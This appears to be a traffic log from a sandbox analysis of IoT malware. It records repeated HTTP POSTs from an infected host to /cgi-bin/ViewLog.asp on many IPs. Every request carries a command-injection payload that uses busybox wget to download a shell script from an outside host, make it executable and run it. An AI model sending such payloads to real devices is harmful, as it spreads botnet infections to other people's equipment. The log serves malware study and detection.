Error</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
715	192.168.2.15	40246	94.121.153.173	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:11.414175034 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
716	192.168.2.15	44754	95.86.69.6	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:11.656661034 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
717	192.168.2.15	47696	31.121.179.201	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:11.822946072 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:12.004898071 CET	332	IN	HTTP/1.1 401 Unauthorized WWW-Authenticate: Basic realm="WEB Remote Viewer", charset="UTF-8" Content-Type: text/html Content-Length: 97 Connection: close Date: Sun, 25 Feb 2024 18:05:39 GMT Server: lighttpd/1.4.67 Data Raw: 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 4e 6f 20 50 65 72 6d 69 73 73 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 4e 6f 20 50 65 72 6d 69 73 73 69 6f 6e 21 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>No Permission</title></head><body>No Permission!</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
718	192.168.2.15	41106	62.29.63.32	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:11.866022110 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
719	192.168.2.15	57066	94.123.34.40	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:11.868140936 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
720	192.168.2.15	49802	94.121.46.180	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:11.878036976 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
721	192.168.2.15	37586	94.70.200.23	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:11.885750055 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:12.125224113 CET	376	IN	HTTP/1.1 404 Not Found Date: Mon, 26 Jan 1970 10:59:01 GMT Server: DNVRS-Webs Cache-Control: no-cache Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
722	192.168.2.15	47666	94.137.74.64	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:12.373272896 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:12.675395966 CET	306	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 25 Feb 2024 18:04:12 GMT Content-Type: text/html Content-Length: 146 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
723	192.168.2.15	49274	31.136.142.14	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:12.377582073 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:15.589708090 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:21.733458042 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:33.765326977 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:58.853056908 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:48.004558086 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
724	192.168.2.15	53850	31.136.63.94	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:12.377702951 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:15.589627028 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:21.733582973 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:33.765328884 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:58.853084087 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:48.004761934 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
725	192.168.2.15	43800	31.136.236.17	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:12.378155947 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:15.589653969 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:21.733597040 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:33.765315056 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:58.853111029 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:48.004686117 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
726	192.168.2.15	45924	31.136.255.176	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:12.383965969 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:15.589612007 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:21.733514071 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:33.765301943 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:58.853117943 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:48.004559994 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
727	192.168.2.15	45878	31.33.9.205	8080

Timestamp	Bytes transferred	Direction	Data
